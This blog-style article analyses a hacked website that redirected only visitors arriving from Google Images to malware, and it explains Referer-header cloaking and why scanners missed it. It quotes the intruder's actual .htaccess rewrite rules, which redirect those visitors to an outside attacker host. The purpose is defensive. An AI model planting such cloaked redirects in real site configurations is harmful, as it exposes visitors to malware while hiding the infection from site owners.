A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1

Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1

Host: www.tradingblox.com

Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1

Host: www.google.com

Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

RewriteRule .* http://search-box.in/in.cgi?4¶meter=u [R,L]

<Files 403.shtml>

order allow,deny

allow from all

</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?